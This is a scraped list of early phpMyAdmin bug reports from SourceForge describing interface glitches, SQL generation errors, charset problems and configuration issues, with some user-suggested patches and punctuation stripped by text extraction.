Simple stuff like displaying list of databases, and table structure works fine.
Does phpMyAdmin require me to be using the old client libraries libmysqlclient.10)?
Or is there something more insidious going on?
I can get this to happen on a uniprocessor and a multiprocessor box.
Iain Frerichs iain monitormedia.co.uk Original URL https sourceforge.net p phpmyadmin bugs 1185 https sourceforge.net p phpmyadmin bugs 1185 Original author anonymous","bug"
"24444","7552","pma flip string.
CVS and 2.5.6 In function PMA flipstring in libraries common.lib.php Php error Notice Uninitialized string offset for i = 0; i lt;= strlen string); i ) should be for i = 0; i lt; strlen string); i ) Original URL https sourceforge.net p phpmyadmin bugs 1182 https sourceforge.net p phpmyadmin bugs 1182 Original author pvtc Found in version Latest Git","bug"
"24444","7553","Password error when copying a user.
MySQL 4.0.18 PHP 4.3.4 phpMyAdmin 2.5.6 but the bug has been existing since the release of MySQL 3.23 and phpMyAdmin 2.5.4, and perhaps before.
..) You will find below how to trigger off the bug from phpMyAdmin home screen example http 127.
0.0.1 mysql ), click on Privileges.
in User Overview table, click on Edit for a chosen user at bottom of the page, in Change Login Information Copy User section when you want to copy a user named MainUser for example) for another host sourceforge.net for example), with another password SourceForge), you type in following informations User name Use Text Field MainUser Host Use Text Field sourceforge.net Password Use Text Field SourceForge well, actually of course !)
This will not work.
The user MainUser is actually copied with all its rights, but the password is not the right one.
You then have to change it by the Change Password section just above the Change Login Information Copy User section and then the password will be ok. You can check it by comparing the MD5 value of the password in the database mysql, table user before and after the change with Change Password.
It would be of course much more useful if the copy would succeed in just one step i.e.
if the password were ok when copying the user).
Thank you for this wonderful tool !!!
Regards, G. TISSIER Original URL https sourceforge.net p phpmyadmin bugs 1183 https sourceforge.net p phpmyadmin bugs 1183 Original author tissier Found in version 2.5.6","bug"
"24444","7554","Copying user does not work.
Copying user does not work, ends with GRANT USAGE , SELECT `Column priv` , `Db` , `Host` , `Table name` , `Table priv` , `User` , `Alter priv` , `Create priv` , `Create tmp table priv` , `Delete priv` , `Drop priv` , `Execute priv` , `File priv` , `Grant priv` , `Host` , `Index priv` , `Insert priv` , `Lock tables priv` , `Process priv` , `References priv` , `Reload priv` , `Repl client priv` , `Repl slave priv` , `Select priv` , `Show db priv` , `Shutdown priv` , `Super priv` , `Update priv` , `User` ) ON `mysql`.`tables priv` TO pmatest ; MySQL said 1054 Unknown column Alter priv in tables priv Using MySQL 4.0.18 Original URL https sourceforge.net p phpmyadmin bugs 1184 https sourceforge.net p phpmyadmin bugs 1184 Original author nijel Found in version Latest Git","bug"
"24444","7555","uploading fails on cfg[ UploadDir ] open basedir.
When cfg[ UploadDir ] and open basedir are set uploading local file fails.
Error message Warning unlink .
tmp browse.sql) No such file or directory in var www html myadmin.
.
.
read dump.php on line 107 I suggest extending the IF statement to if !empty open basedir) empty cfg[ UploadDir ])) in line 107, after that there are no errors.
Original URL https sourceforge.net p phpmyadmin bugs 1186 https sourceforge.net p phpmyadmin bugs 1186 Original author anonymous","bug"
"24444","7556","multi edit updates completely ignored.
if you select 3 records say) for update, you get presented with a large form showing all fields from all 3 records.
If you don t actually change the last record at all, then hit OK..... absolutely no updates are done at all and all your data has been lost in the POST.
Haven t tested to see if you need to change ALL records or just the LAST record to stop this happening... but it shouldn t happen.
I ve selected 3 records... decided not to update the last, expecting the first 2 to get update but my changes are lost.
Original URL https sourceforge.net p phpmyadmin bugs 1187 https sourceforge.net p phpmyadmin bugs 1187 Original author wanderingzombie Found in version 2.5.6 rc2","bug"
"24444","7557","browse foreigners select in popup doesn t work.
In browse foreigners you will have a small icon which will open a new window, where you can select a value, when the values of the field exceed the number of 100 ?).
The selecting and the fill out of the insert of the form from the opener window doesn t work with the version 2.56 or the last you can download from sourceforge).
I changed the php in browse foreigners.php line 45 51) to function formupdate field, key) \{ if opener opener.document opener.document.insertForm opener.document.insertForm.elements[ field field lt;?php echo isset pk) ?
[multi edit][ .
urlencode pk) . ]
); ?
gt;[] ]) \{ opener.document.insertForm.elements[ field field lt;?php echo isset pk) ?
[multi edit][ .
urlencode pk) . ]
); ?
gt;[] ].value = key; self.close ); \} else \{ alert lt;?php echo PMA jsFormat strWindowNotFound); ?
gt; ); \} Then it works.
There is another bug in line 106 which I didn t solved.
This line produces the link to a next page when the values in the field exceed 200.
For now I simple exceed the number of per page to 500\.
With this value I can work for now.
I come to this point it doesn t work) .
lt;select name= goToPage onChange= goToUrl this, \ browse foreigners.php?field= .
urlencode field) .
amp;amp; .
db= .
db .
amp;amp; .
table= .
table .
amp;amp; .
urlencode pk uri) .
\ ); gt; ; There is something wrong till now..,... Hartmut Original URL https sourceforge.net p phpmyadmin bugs 1188 https sourceforge.net p phpmyadmin bugs 1188 Original author hartmutkern","bug"
"24444","7558","Incorrect results with search.
Currently, my default sql statement is set to SELECT FROM [table] WHERE 1 Unfortunately, this messes with the search functionality.
If I want to find all records that have say an empty varchar column, it doesn t work.
The query that it generates on my machine by putting in the corresponding field is this ...
SELECT FROM `product code` WHERE 1 AND `productCodeID` = LIMIT 0 , 30 This returns no records.
Yet there is one record in the table that matches the criteria I entered.
If I change the query to this, it works as intended SELECT FROM `product code` WHERE `productCodeID` = LIMIT 0 , 30 The WHERE 1 clause seems to override the next statement causing it to return nothing.
Original URL https sourceforge.net p phpmyadmin bugs 1191 https sourceforge.net p phpmyadmin bugs 1191 Original author mrsmiley18 Found in version 2.5.6","bug"
"24444","7559","SQL statements limited to 1500 bytes.
When you input a query that is larger then 1500 bytes, and you want to change the query in the popup), everything after the first 1500 bytes is dropped, and the last 2 characters are set to 2 .
Original URL https sourceforge.net p phpmyadmin bugs 1189 https sourceforge.net p phpmyadmin bugs 1189 Original author anonymous","bug"
"24444","7560","Copy table to another database frameset error.
The error is simple.
After a successful copy table to a different database, any links on the left frameset opens a new window and not in the right frameset.
Ganesh Lohia ganesh at pobox dot com Original URL https sourceforge.net p phpmyadmin bugs 1190 https sourceforge.net p phpmyadmin bugs 1190 Original author anonymous Found in version 2.5.6","bug"
"24444","7561","number of tables not updated in dropdown list.
In the left frame When clicking on the database name below the database dropdown field the table list gets reloaded.
but the number of tables mentioned in the dropdown field is not updated.
Example mydatabase contains 10 tables I run a script somewhere outside PMA!)
to add two more tables I click on mydatabase to refresh the list in the main frame and see 12 tables now the dropdown still says mydatabase 10) instead.
Original URL https sourceforge.net p phpmyadmin bugs 1192 https sourceforge.net p phpmyadmin bugs 1192 Original author landseer Found in version 2.5.6","bug"
"24444","7562","Select Search page breaks on foreign keys.
The Select Search feature breaks on tables with foreign keys when the relations haven t been configured manually.
I ve written a patch to gracefully allow the Select Search page to work without the extra step of configuring the relation.
Of course the dropdown list is not available, but the at least the page doesn t break.
The patch can be also found at http www.11abacus.com cvs phpMyAdmin relation.lib.diff Thanks, Philippe Original URL https sourceforge.net p phpmyadmin bugs 1193 https sourceforge.net p phpmyadmin bugs 1193 Original author jausions Found in version Latest Git","bug"
"24444","7563","Deleting Column Warning Spelling Error.
Hello.
There is an spelling and also an query error in the warning when you want to del a column Mxc3xb6chten Sie wirklich diese Abfrage ausfxc3xbchren ALTER TABLE `test` DROP `date`, DROP `folder`, DROP `geblockt`; DROP `host`, ?
It should be Mxc3xb6chten Sie wirklich diese Abfrage ausfxc3xbchren?
ALTER TABLE `test` DROP `date`, DROP `folder`, DROP `geblockt`, DROP `host`; It works, but the query is wrong displayed...
Original URL https sourceforge.net p phpmyadmin bugs 1194 https sourceforge.net p phpmyadmin bugs 1194 Original author blackdrake Found in version Latest Git","bug"
"24444","7564","Unable to edit double and float numbers.
I am unable to to edit double and float numbers because there is maxlength= 20 in HTML code.
For my local installation I changed file tbl change.php , line 749 else \{ fieldsize = maxlength = 20; \} end if... else... with the following else \{ fieldsize = 20; maxlength = 99; \} end if... else...
It works fine now.
Original URL https sourceforge.net p phpmyadmin bugs 1195 https sourceforge.net p phpmyadmin bugs 1195 Original author yrtimd Found in version 2.5.6","bug"
"24444","7565","Wrong query that has twice the same field.
Wrong results returned for query that has twice the same field.
aliasing doesn t help.
drop table if exists try table; CREATE TABLE try table id tinyint 3) unsigned NOT NULL auto increment, ts timestamp NOT NULL, PRIMARY KEY id), ) TYPE=MyISAM DEFAULT CHARSET=latin1 PACK KEYS=1; INSERT INTO try table id, ts) VALUES 1, 2003 12 23 20 34 32 ), 2, 2004 04 06 16 43 05 ), 3, 2003 12 23 20 36 23 ), 4, 2004 04 06 16 43 01 ), 5, 2004 04 06 16 43 06 ), 6, 2003 12 23 20 34 32 ), 7, 2003 12 23 20 34 32 ), 8, 2003 12 23 20 36 23 ), 9, 2003 12 23 20 36 23 ), 10, 2004 04 06 16 43 11 ) ; SELECT t.id , t.id , 0 FROM try table AS t ; this return id|id|0 0| 1|0 0| 2|0 0| 3|0 0| 4|0 0| 5|0 0| 6|0 0| 7|0 0| 8|0 0| 9|0 0|10|0 Original URL https sourceforge.net p phpmyadmin bugs 1196 https sourceforge.net p phpmyadmin bugs 1196 Original author francesco75 Found in version 2.5.6","bug"
"24444","7566","LaTex Data Export Fails.
I got an error while trying to export data to LaTex.
PMA told me there was no database selected.
As an workaround I changed line 871 from libraries build dump.lib.php to fix this problem from 871 local query = SHOW FIELDS FROM .
PMA backquote table); to 871 local query = SHOW FIELDS FROM .
PMA backquote table) .
FROM .
PMA backquote db); helge binnewies.net Original URL https sourceforge.net p phpmyadmin bugs 1197 https sourceforge.net p phpmyadmin bugs 1197 Original author anonymous Found in version 2.5.1","bug"
"24444","7567","virus warnings from BDC.
this is the warning I get test mounthdd phpMyAdmin 2.5.6 left.php= gt; JAVASCRIPT 5) infected JS.Fortnight.D test mounthdd phpMyAdmin 2.5.6 queryframe.php= gt; JAVASCRIPT 1) infected JS.Fortnight.D test mounthdd phpMyAdmin 2.5.6 tbl query box.php= gt; JAVASCRIPT 4) infected JS.Fortnight.D test mounthdd phpMyAdmin 2.5.6 tbl query box.php= gt; JAVASCRIPT 5) infected JS.Fortnight.D test mounthdd phpMyAdmin 2.5.6 tbl select.php= gt; JAVASCRIPT 1) infected JS.Fortnight.D I dont get it with older versions so I dont know if it was something that slipped into the release.. anyway.. maybe you people can finf out what is wrong.. and hopefully fix it... untill that time I will use my old 2.5.4) version again because that doesnt produce any warnings greetings VNA9216 good luck with the project Original URL https sourceforge.net p phpmyadmin bugs 1198 https sourceforge.net p phpmyadmin bugs 1198 Original author anonymous","bug"
"24444","7568","Check Privileges fails on Databases.
My email is anandkolatkar yahoo.com Fresh install of phpdev with phpMyAdmin 2.5.6.
Install and testing of phpdev went fine.
However, when checking phpMyAdmin, I went to the Databases tab and saw the list of databases.
When I click on the Check Privileges link next to any of the databases, I get the following error below).
Any ideas or fixes?
Thanks.
ERROR Users having access to phpwebsite User Host Type Privileges Grant Action Error SQL query SELECT `User` , `Host` , `Db` , `Select priv` , `Insert priv` , `Update priv` , `Delete priv` , `Create priv` , `Drop priv` , `Grant priv` , `References priv` FROM `db` WHERE phpwebsite LIKE `Db` AND NOT `Select priv` = N AND `Insert priv` = N AND `Update priv` = N AND `Delete priv` = N AND `Create priv` = N AND `Drop priv` = N AND `Grant priv` = N AND `References priv` = N ) ) UNION SELECT `User` , `Host` , AS Db , `Select priv` , `Insert priv` , `Update priv` , `Delete priv` , `Create priv` , `Drop priv` , `Grant priv` , `References priv` FROM `user` WHERE NOT `Select priv` = N AND `Insert priv` = N AND `Update priv` = N AND `Delete priv` = N AND `Create priv` = N AND `Drop priv` = N AND `Grant priv` = N AND `References priv` = N ) ) ORDER BY `User` ASC , `Host` ASC , `Db` ASC ; MySQL said 1064 You have an error in your SQL syntax near SELECT `User`, `Host`, `Db`, `Select priv`, `Insert priv`, `Update priv`, `Dele at line 1 Original URL https sourceforge.net p phpmyadmin bugs 1199 https sourceforge.net p phpmyadmin bugs 1199 Original author anonymous Found in version 2.5.6","bug"
"24444","7569","Multibyte charsets problems in parser.
When executing query using en utf 8 translation) INSERT INTO `zkouxc2x9aka` `id`, `xc2x9akola`) VALUES , fdfdsfs\ fdsfds ); It is displayed as INSERT INTO `zkouxc2x9aka` id`, , xc2x9akola`) ) LUES , , dfdsfs\ fdsfds ); Edit link works fine.
Original URL https sourceforge.net p phpmyadmin bugs 1200 https sourceforge.net p phpmyadmin bugs 1200 Original author nijel Found in version Latest Git","bug"
"24444","7570","PHP parameter error fails PMA SQP formatHtml.
This is related to 818342 Error browsing tables and forum thread Unable to Browse Tables The function call to function PMA SQP formatHtml arr, mode= color , start token=0, number of tokens= 1) with the optional variables left blank, initializes number of token to 0, instead of the given 1.
This results in an arraysize == 0 and the function returns an empty query which MySQL indicates as 1064 You have an error in your SQL syntax.
Check the manual that corresponds to your MySQL server version for the right syntax to use near LIMIT 0, 30 at line 1 A simple workaround is working fine to me function PMA SQP formatHtml arr, mode= color , start token=0, number of tokens= 1.0) Original URL https sourceforge.net p phpmyadmin bugs 1201 https sourceforge.net p phpmyadmin bugs 1201 Original author strwex","bug"
"24444","7571","Logging out does not allow logging back in http auth).
Using IE 6, on Windows XP Pro SP2.
When you click on Log out and try to log back in, the login does not let you back in reguardless how many times you try.
The only remedy is to close the browser and try again, and it works on the first try.
My auth config is set to http Tim Original URL https sourceforge.net p phpmyadmin bugs 1202 https sourceforge.net p phpmyadmin bugs 1202 Original author anonymous Found in version 2.6.0 alpha1","bug"
"24444","7572","undefined offset in blowfish.php.
After a password change via user password.php, the new password was not propagated correctly to the cookie password.
Original URL https sourceforge.net p phpmyadmin bugs 1203 https sourceforge.net p phpmyadmin bugs 1203 Original author lem9 Found in version 2.6.0 alpha1","bug"
"24444","7573","can t have uppercase in database names.
I would guess this is a well known bug as it is pretty obvious but i have been searching a while now and can t find anything about it.
problem If a DB name has uppercase anywhere in the name; when a table in this DB is BROWSED the left frame showing the database table list disappears os WindowsXP tested versions 2.5.4, 2.5.6, 2.6alpha Peter....
Original URL https sourceforge.net p phpmyadmin bugs 1204 https sourceforge.net p phpmyadmin bugs 1204 Original author ptalindstrom","bug"
"24444","7574","Export data from empty table = invalid SQL.
In 2.6.0 alpha1, doing a full database export including structure and data of all tables) results in invalid SQL a superfluous semicolon) when a table contains no data Dumping data for table `empty table` ; Table structure for table `some other table` In 2.5.6, this did not happen Dumping data for table `empty table` Table structure for table `some other table` Original URL https sourceforge.net p phpmyadmin bugs 1205 https sourceforge.net p phpmyadmin bugs 1205 Original author ryandesign Found in version 2.6.0 alpha1","bug"
"24444","7575","Endless Loop for right frame.
v2.5.6 exhibits a weird behaviour when clicking on a table name in the left frame.
The right frame appears to partially display the table structre page sometimes with visible html tags dumped to the screen) and then continuously does a redirect again to tbl properties.php?
sql structure....
When I click on a table name in the left frame, sometimes it will appear to load the right frame but then do nothing, sometimes it will display the table structure in the right frame instantly, and at other times it will loop rapidly and continuously before displaying it.
As it loops, it may or may not display a partial page usually with html tags dumped to the right frame).
Most times, it comes good and displays the full table structure.
Other times, it ends up with a broken page, with lots of crap and visible html tags.
I am running WinXP, PHP4.3.6, MySQL 3.23.58 on IE6.0.2600.0000.xpclnt qfe.021108 2107 I have cfg[ PmaAbsoluteUri ] set to http localhost phpmyadmin Ignatius ignatius act28.com Original URL https sourceforge.net p phpmyadmin bugs 1206 https sourceforge.net p phpmyadmin bugs 1206 Original author anonymous","bug"
"24444","7576","mb strlen ) Unknown encoding windows 1257 .
While I m trying to view table s content with encoding windows 1257, I m getting error Warning mb strlen ) Unknown encoding windows 1257 in xxxxxxxxxxxxxx libraries string.lib.php on line 45.
After hacking code at string.lib.php 27 line GLOBALS[ PMA has mbstr ] = 0; function exists mb strlen ); it s OK.
Original URL https sourceforge.net p phpmyadmin bugs 1207 https sourceforge.net p phpmyadmin bugs 1207 Original author linasg Found in version 2.6.0 alpha1","bug"
"24444","7577","Wrong selected index in left frame [Safari].
If I drop a database, the right frame reloads to the start page, and then the left frame reloads so that the removed database is no longer in the select menu.
So far so good.
But when the left frame reloads, the select menu of databases has the wrong item pre selected, thus If I had databases a, b, c and d, and then I dropped database b the 2nd database in the list then, when the left frame reloads, b has been removed from the list, but c is now selected, because c is now the 2nd database in the list.
This occurs, at least, in Safari 1.2.1 on Mac OS X 10.3.3. phpMyAdmin should instead select the first item in the list, the one called Databases) ...
Original URL https sourceforge.net p phpmyadmin bugs 1208 https sourceforge.net p phpmyadmin bugs 1208 Original author ryandesign Found in version 2.6.0 alpha1","bug"
"24444","7578","Query window sometimes has location bar.
When I click the query window link in the lower left of the phpMyAdmin frameset, the window opens up without the location bar, without favorites bar great.
But when I click the Edit link on any SQL statement, and the query window had not previously been opened, then it opens WITH location bar, with favorites bar not so great, especially because the height of the window is then insufficient to display all its content because, unfortunately, the height specified in the window.open command controls the height of the window WITH chrome, and not, as one might have wished, the height of the content).
I think it would be better if phpMyAdmin would always open the window without the location bar and without the favorites bar.
I don t know if this behavior is browser specific, but it happens to me in Safari 1.2.1 and Mozilla Firefox 0.8 on Mac OS X 10.3.3.
Original URL https sourceforge.net p phpmyadmin bugs 1209 https sourceforge.net p phpmyadmin bugs 1209 Original author ryandesign Found in version 2.6.0 alpha1","bug"
"24444","7579","ascending descending sort order icons backwards.
When sorting the rows of a query, the little ascending or descending icon shown is the opposite of what it should be.
When the rows are sorted in ascending order, the descending icon is shown, and vice versa.
The tooltip on the icon, however, reads as it should.
That is the icon is the descending icon, but the tooltip correctly reads Ascending .
This is not a coding problem; the asc order.png and desc order.png files are simply misnamed.
Switch the names on the files and the problem will be corrected.
Also, there is a little bit of incorrect stray background color within the two aforementioned image files.
Perhaps the background part of those images could be made transparent instead, as in some of the other PNG images.
Original URL https sourceforge.net p phpmyadmin bugs 1210 https sourceforge.net p phpmyadmin bugs 1210 Original author ryandesign Found in version 2.6.0 alpha1","bug"
"24444","7580","Btns row w PropertiesIconic off.
With cfg[ PropertiesIconic ] = FALSE, at the bottom of a result set is the following text and buttons With selected row edit row delete row export The text before the buttons is localized into different languages in German it says markierte ) but the names of the buttons are always the same, not localized, and not very user friendly.
It looks more like a programmer s label than text that was intended to be read by a user.
The names of the buttons should be written to be more friendly to the user, and localized.
For example English With selected rows Edit Delete Export German markierte Datensxc3xa4tze Bearbeiten Lxc3xb6schen Exportieren and so on.
This behavior occurs at least in Safari 1.2.1 and Mozilla Firefox 0.8 on Mac OS X 10.3.3.
It is not something that has just started with phpMyAdmin 2.6.0 alpha1; it has been this way since the buttons first appeared.
With cfg[ PropertiesIconic ] = TRUE or both the text is properly localized.
Original URL https sourceforge.net p phpmyadmin bugs 1211 https sourceforge.net p phpmyadmin bugs 1211 Original author ryandesign Found in version 2.6.0 alpha1","bug"
"24444","7581","Editing user permissions to nonexistent database.
I had a database, and I created a MySQL user, and I gave that user permission to play with the database.
Then I deleted the database.
Now, when I go in to edit privileges for this user s access to that nonexistent database, I get this error within the page mysql query ) Unable to save result set in phpMyAdmin 2.6.0 alpha1 libraries dbi mysql.dbi.lib.php on line 122 Perhaps this situation should be anticipated and greeted with a better error message.
Or, perhaps when deleting the database in the first place, phpMyAdmin could have automatically revoked all users access to the database.
Or, it could have asked me if that s what I wanted to do.
Original URL https sourceforge.net p phpmyadmin bugs 1212 https sourceforge.net p phpmyadmin bugs 1212 Original author ryandesign Found in version 2.6.0 alpha1","bug"
"24444","7582","db datadict.php div problem, header suggestion.
When viewing the data dictionary for my database, between the output for the first and second database tables, it inserts this code lt; div gt; lt;div style= page break before always gt; Problem is, that div it closes?
It never got opened!
I noticed this because I m writing a custom stylesheet for my phpMyAdmin installation, and the changes I ve made caused this error to be quite visually apparent.
In db datadict.php, we can see that on line 283 the div is closed every time, but only opened on line 67) if count is not 0.
Adding an else part on line 68 which outputs the div without the style part should fix it.
While you re changing this file, would it be possible to output the database table names inside an h2, instead of an h1 like it is now?
On every other phpMyAdmin page I ve looked at so far, the only h1 is at the very top of the page, and my stylesheet would really appreciate it if the database table names here were recognizable as an entity other than h1.
And h2 has already been used for subheads on pages like Privileges and Status, so I think it would be appropriate here too.
Original URL https sourceforge.net p phpmyadmin bugs 1213 https sourceforge.net p phpmyadmin bugs 1213 Original author ryandesign Found in version 2.6.0 alpha1","bug"
"24444","7583","colspan off by one on two pages.
When viewing a set of rows, the colspan parameter on the HTML table cell containing the Sort by key select box is one too small.
For example, if I have a MySQL table with one column and I view this, the Sort by key select box is inside an HTML table cell with colspan= 3 but it should span four columns the checkbox, the edit button, the delete button, and the data for the one column.
If I view a database table with two columns, colspan= 4 , and the cell spans the checkbox, the edit button, the delete button, and the first database column, but not the second database column.
A similar problem exists when looking at the right frame after selecting a database, only here it s the last row in the HTML table, the one containing the Check All Uncheck All links and the select menu With selected .
The HTML table cell enclosing this stuff is also one column too narrow it spans 11 columns but should span 12.
The problem is visually apparent when you set cfg[ Border ] gt;= 1; Original URL https sourceforge.net p phpmyadmin bugs 1214 https sourceforge.net p phpmyadmin bugs 1214 Original author ryandesign Found in version 2.6.0 alpha1","bug"
"24444","7584","Undefined variable table array left.php line 563.
An error message about an undefined variable table array in left.php on line 563 appears in the source code of the left frame after you select a database.
cfg[ LeftFrameLight ] == TRUE) This did not happen with phpMyAdmin 2.5.6 Original URL https sourceforge.net p phpmyadmin bugs 1215 https sourceforge.net p phpmyadmin bugs 1215 Original author ryandesign Found in version 2.6.0 alpha1","bug"
"24444","7585","print r debug output in tbl indexes.php line 410.
Line 410 of tbl indexes.php is print r cfg[ PropertiesIconic ]); which seems to be debugging code and should probably be removed.
This is part of a block of new code which wasn t in phpMyAdmin 2.5.6.
Original URL https sourceforge.net p phpmyadmin bugs 1216 https sourceforge.net p phpmyadmin bugs 1216 Original author ryandesign Found in version 2.6.0 alpha1","bug"
"24444","7586","use <database> fails if followed by other SQL.
If I execute the SQL query use some database; phpMyAdmin switches to the new database.
If I then execute a second SQL query select from some table it selects all the rows from some table.
This works correctly.
But if I try to execute it all at once use some database; select from some table; then I get an error 1146 Table current database.some table doesn t exist where current database is the database I m currently in, and not some database as I wanted.
It didn t switch to the new database like I told it to.
And, when I click the Back link, the use some database ; part of the query has been erased.
This occurs both in phpMyAdmin 2.6.0 alpha1 and 2.5.6; I didn t test further back.
This should work, because it works fine with the mysql command line client echo use some database; select from some table; | mysql uroot psome password current database This does in fact give me the result set from some table in some database; it doesn t care that current database was previously selected.
Original URL https sourceforge.net p phpmyadmin bugs 1217 https sourceforge.net p phpmyadmin bugs 1217 Original author ryandesign Found in version 2.6.0 alpha1","bug"
"24444","7587","Sort order triangle placement needs nowrap.
When the name of a column is wider than the content of each of its rows for example, the column is an auto incrementing index, and the name is some really long id and you are looking at rows of this table, and you click the column header to sort it then the little icon to show ascending or descending order does not appear to the right of the column name as it usually does, but is instead pushed down to the row below it.
Some ways to fix this would be to enclose the column name and icon in a lt;nobr gt; tag, or to set nowrap= nowrap in the table header.
Original URL https sourceforge.net p phpmyadmin bugs 1218 https sourceforge.net p phpmyadmin bugs 1218 Original author ryandesign Found in version 2.6.0 alpha1","bug"
"24444","7588","SQL History space between query and Change button.
I am using the SQL history tab of the phpMyAdmin pop up query window for the first time, and am seeing that it shows its list like this Change[phpmyadmin] select from pma relation Change[phpmyadmin] select from pma column info I have cfg[ PropertiesIconic ] == FALSE.
It would be better if there were some space between the word Change and the bracketed name of the database.
Original URL https sourceforge.net p phpmyadmin bugs 1219 https sourceforge.net p phpmyadmin bugs 1219 Original author ryandesign Found in version 2.6.0 alpha1","bug"
"24444","7589","deleting single item from table.
When we wan t to delete single item from any table in some database with using trash icon near that item, after ok click in message box there is an error reported by phpMyAdmin 2.5.6 Original URL https sourceforge.net p phpmyadmin bugs 1220 https sourceforge.net p phpmyadmin bugs 1220 Original author anonymous","bug"
"24444","7590","First click to expand in left frame is ignored.
First click on icon in left frame not light mode) is just ignore, following work fine.
No js error, Mozilla 1.6 Original URL https sourceforge.net p phpmyadmin bugs 1221 https sourceforge.net p phpmyadmin bugs 1221 Original author nijel","bug"
"24444","7591","Create table doubles .
After creating a new database, I create a new table immediately.
However, the problem occurs.
No matter what fields I create by using phpAdmin GUI, it always failed by repeated the field twice.
It shows the message as following Error SQL query CREATE TABLE `TEST` `serial` INT UNSIGNED NOT NULL AUTO INCREMENT , `memo` VARCHAR 10 ) NOT NULL , `serial` INT UNSIGNED NOT NULL AUTO INCREMENT , `memo` VARCHAR 10 ) NOT NULL , PRIMARY KEY `serial` ) ) MySQL said 1060 Duplicate column name serial I haved tested with phpmyadmin 2.5.6 and 2.5.1 and my database is MySQL 3.23.58 running on localhost as root localhost Original URL https sourceforge.net p phpmyadmin bugs 1222 https sourceforge.net p phpmyadmin bugs 1222 Original author openview","bug"
"24444","7592","only db shows every db if no matching db.
When using a configuration with only db, if there is no database matching the expression used, PHPMyAdmin will show every databases.
For example, if we have only db = foo and there is no database named foo something, PHPMyAdmin will show everything, because dblist is empty after checking only db and therefore PMA availableDatabases will think the list of allowed databases was left intentionnally empty.
Original URL https sourceforge.net p phpmyadmin bugs 1223 https sourceforge.net p phpmyadmin bugs 1223 Original author zifnab Found in version 2.5.6","bug"
"24444","7593","When login expires, new login doubles left frame.
I didn t know how to title this report; it s not easy to write a one line summary.
The point is that if you log in to phpMyAdmin, and work for awhile, go get lunch, come back, and try to continue working in the same phpMyAdmin window, what often happens is that the login box is displayed again asking to log in again.
The session has timed out, the login cookie has expired, whatever it is, I don t know.)
But the login form is then displayed in the frame where you were trying to work, and did not take over the frameset.
For example, I have a list of records up in the right frame, and I leave that window up for hours.
Then I come back and click Edit on one of the records.
The right frame now has the login box in it, and the left frame still has the list of databases.
I log in.
Now the right frame is replaced with a new frameset containing the left and right frames.
So the left frame is now shown twice.
I ve only noticed this recently since 2.6.0 alpha1 or maybe 2.5.6 but it seems that in one or the other of those release a change was made so that I have to log in much more frequently.
I used to be able to use phpMyAdmin the whole day long without having to log in more than just once at the beginning of the day.
Now I get logged out a couple times daily, so I now see this problem.
Original URL https sourceforge.net p phpmyadmin bugs 1224 https sourceforge.net p phpmyadmin bugs 1224 Original author ryandesign Found in version 2.6.0 alpha1","bug"
"24444","7594","wrong value after insert lang=ja sjis).
Name Mr. hayato Email va group hotmail.com amp; 12469; amp; 12540; amp; 12496; amp; 12540; amp; 12398; amp; 12496; amp; 12540; amp; 12472; amp; 12519; amp; 12531; 4.1.1 PHP amp; 12496; amp; 12540; amp; 12472; amp; 12519; amp; 12531; 4.3.5RC3 wrong value after insert lang=ja sjis) Using manual insert [sql] button at right panel.
CREATE TABLE `ro item` `item id` int 8) NOT NULL default 0 , `item name` varchar 40) NOT NULL default 0 , `item jname` varchar 255) NOT NULL default , `item type` tinyint 2) NOT NULL default 0 , `item price` tinyint 6) NOT NULL default 0 , `item sell` tinyint 6) NOT NULL default 0 , `item weight` tinyint 5) NOT NULL default 0 , `item atk` tinyint 3) NOT NULL default 0 , `item def` tinyint 2) NOT NULL default 0 , `item range` tinyint 8) NOT NULL default 0 , `item slot` tinyint 8) NOT NULL default 0 , `item job` tinyint 8) NOT NULL default 0 , `item gender` tinyint 8) NOT NULL default 0 , `item loc` tinyint 8) NOT NULL default 0 , `item wlv` tinyint 8) NOT NULL default 0 , `item elv` tinyint 8) NOT NULL default 0 , `item view` tinyint 8) NOT NULL default 0 , `item usescript` tinytext NOT NULL, `item equipscript` tinytext NOT NULL, PRIMARY KEY `item id`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1; INSERT INTO `ro item` VALUES 525, Panacea , amp; 19975; amp; 33021; amp; 34220; ,0,500,0,100,0,0,0,0,10477567,2,0,0,0,0, \{ sc end SC Poison; sc end SC Silence; sc end SC Blind; sc end SC Confusion; sc end SC Curse; \} , \{\} ); INSERT INTO `ro item` VALUES 526, Royal Jelly , amp; 12525; amp; 12540; amp; 12516; amp; 12523; amp; 12476; amp; 12522; amp; 12540; ,0,7000,0,150,0,0,0,0,10477567,2,0,0,0,0, \{ itemheal rand 325,404),rand 40,59); sc end SC Posion; sc end SC Silence; sc end SC Blind; sc end SC Confusion; sc end SC Curse; \} , \{\} ); but get INSERT INTO `ro item` VALUES 525, Panacea , amp; 19975; amp; 34180; amp; 12539;, 0, 127, 0, 100, 0, 0, 0, 0, 127, 2, 0, 0, 0, 0, \{ sc end SC Poison; sc end SC Silence; sc end SC Blind; sc end SC Confusion; sc end SC Curse; \} , \{\} ); INSERT INTO `ro item` VALUES 526, Royal Jelly , amp; 12525; amp; 12540; amp; 12516; amp; 12523; amp; 12476; amp; 12522; amp; 12540; , 0, 127, 0, 127, 0, 0, 0, 0, 127, 2, 0, 0, 0, 0, \{ itemheal rand 325,404),rand 40,59); sc end SC Posion; sc end SC Silence; sc end SC Blind; sc end SC Confusion; sc end SC Curse; \} , \{\} ); Thank you for looking into it.
Original URL https sourceforge.net p phpmyadmin bugs 1225 https sourceforge.net p phpmyadmin bugs 1225 Original author anonymous Found in version 2.6.0 alpha1","bug"
"24444","7595","DB based query history doesent work.
i tried to turn on the DB based query history im the 2.6.0 alpha1 release.
it doesent work apart from the JShistory i do not get the old queries.
when i change to another DB and then back to that one, i have an empty history again.
i created the pma history table like in this documentation http www.hirnbrand.de kanalvoll db phpMyAdmin 2.6.0 alpha1 Documentation.html history and i set cfg[ QueryHistoryDB ] = TRUE; and cfg[ Servers ][ i][ history ] = pma history ; but there is nothing stored.
wouldnt it be good to have one central pma history in tha database mysql where are stored the userdata as well?
or maybe a new database pma only for this kind of stuff?
i think the DB based query history is a very good idea and should be finished Original URL https sourceforge.net p phpmyadmin bugs 1226 https sourceforge.net p phpmyadmin bugs 1226 Original author rubo77","bug"
"24444","7596","Thousands of dbs tables.
i administrate a server with more than 200.000 databases.
yes, i know this is unwise, but someone did it ) the problem is, that the left frame of tries to show all the databases inside the selectbox, and that is too long.
